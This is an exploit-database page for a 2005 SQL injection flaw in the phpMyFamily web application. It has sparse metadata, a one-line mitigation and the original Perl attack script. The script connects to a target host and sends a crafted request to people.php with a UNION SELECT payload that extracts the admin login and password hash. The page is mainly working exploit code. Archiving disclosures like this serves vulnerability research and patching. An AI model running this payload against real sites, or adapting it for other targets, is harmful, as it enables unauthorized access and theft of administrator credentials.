phpMyFamily Exploit injection

vendor:

phpMyFamily

by:

INFGPG-Hacking&Security Research

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: phpMyFamily

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

phpMyFamily Exploit injection

This exploit allows an attacker to inject malicious SQL code into the phpMyFamily application, allowing them to gain access to the admin account with the login and password hash.

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
# phpMyFamily Exploit injection
# ==============================
$banner = "phpMyFamily Exploit injection \n\n==============================
\n\nINFGPG-Hacking&Security Research";
# 
# Greats: AresU (1st IndoSec Team),ADZ Security Team (has discovered bugs)
# Info: 98.to/infamous

use IO::Socket;
if ($#ARGV<0){
print "\n$banner";
print "\n\n Usage: perl phpMyFamily.pl [host] [path] \n\n";
exit;}

$gen="%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WH
ERE%20admin='Y'%20LIMIT%201,1"; # This selects first admin with login &
password hash :)

$serius="GET $ARGV[1]/$ARGV[2]/people.php?person=00002'$gen HTTP/1.0\r\n\r\n";
$muka=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$ARGV[0]",PeerPort=>"80")
or die "$ARGV[0]Connection Failed !!\n\n";

$muka -> autoflush(1);
print $muka "$serius";   
print "[*]Sending exploit DONE \n\n";            
sleep(7);
close($muka);

# milw0rm.com [2005-03-27]